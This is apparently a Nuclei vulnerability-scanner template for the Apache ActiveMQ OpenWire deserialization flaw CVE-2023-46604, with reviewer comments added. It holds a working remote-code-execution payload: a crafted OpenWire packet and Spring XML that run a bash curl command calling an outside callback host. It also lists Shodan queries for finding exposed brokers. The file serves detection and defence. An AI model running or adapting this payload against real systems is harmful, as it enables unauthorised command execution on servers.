nuclei-templates/javascript/cves/2023/CVE-2023-46604.yaml


# Nuclei template for CVE-2023-46604 (Apache ActiveMQ OpenWire deserialization, CWE-502).
# Confirmation is out-of-band: the broker is made to resolve a DNS name that embeds a
# per-run random token, and the interactsh callback is matched against that token.
id: CVE-2023-46604

info:
  name: Apache ActiveMQ - Remote Code Execution
  author: Ice3man,Mzack9999,pdresearch
  severity: critical
  # Fixed versions are named in the description (5.15.16, 5.16.7, 5.17.6, 5.18.3).
  description: |
    Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/10/27/5
    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
    - https://github.com/X1r0z/ActiveMQ-RCE
    - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
    - https://paper.seebug.org/3058/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46604
    cwe-id: CWE-502
    epss-score: 0.97273
    epss-percentile: 0.99837
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    # A single TCP exchange per target; the pre-condition below may skip even that.
    max-request: 1
    vendor: apache
    product: activemq
    shodan-query:
      - product:"ActiveMQ OpenWire Transport"
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev

# NOTE(review): none of these variables is referenced by the javascript section
# below, which builds its own packet literal; they look like leftovers — confirm
# before removing.
variables:
  prefix: "1f00000000000000000001010042"
  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
  final: "{{prefix}}{{classname}}"

javascript:
  # Presumably skips the request when the target port does not accept a TCP
  # connection, so unreachable hosts produce no traffic — confirm against the
  # nuclei javascript protocol docs.
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      // NOTE(review): exploit_xml, packet and resp are assigned without
      // let/var and therefore become globals; resp is never read.
      let m1 = require('nuclei/net');
      let m2 = require('nuclei/bytes');
      let b = m2.Buffer();
      let name=Host+':'+Port;
      let conn = m1.Open('tcp', name);
      // Per-run token; it is embedded in the callback hostname below and is
      // also the value this script returns for the matcher.
      let randomvar = '{{randstr}}'.toLowerCase();
      var Base64={encode: btoa}
      // The broker-side effect this template depends on is an outbound DNS
      // lookup (via curl) for <randomvar>.<oob>. A broker host resolving
      // unexpected interactsh-style names is the artefact a defender can
      // alert on.
      exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
      packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
      packet+=(exploit_xml.length).toString(16)
      packet+=(b.WriteString(exploit_xml)).Hex()
      conn.SendHex(packet);
      resp = conn.RecvString()
      // Last expression is the script's result; presumably exposed to the
      // matchers as `response` — confirm.
      randomvar
    args:
      Host: "{{Host}}"
      # ActiveMQ's default OpenWire listener; brokers bound to another port
      # are not checked by this template.
      Port: "61616"
      oob: "{{interactsh-url}}"
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(interactsh_request, response)'
        # Both must hold: a DNS interaction arrived AND its hostname carries the
        # random token, so an unrelated callback does not yield a false positive.
        condition: and
# NOTE(review): template signature line — presumably computed over the content
# above, so any edit (comments included) invalidates it until re-signed.
# digest: 4a0a00473045022057e01ef1d30cc0a70e849e0c6fe4e8e3fbbec9965b3c00043d531726b6b2f8ca022100818d0bfc74f0746cf459838fd25f78d7b518025f549b30bb5998476e890301a0:922c64590222798bb761d5b6d8e72950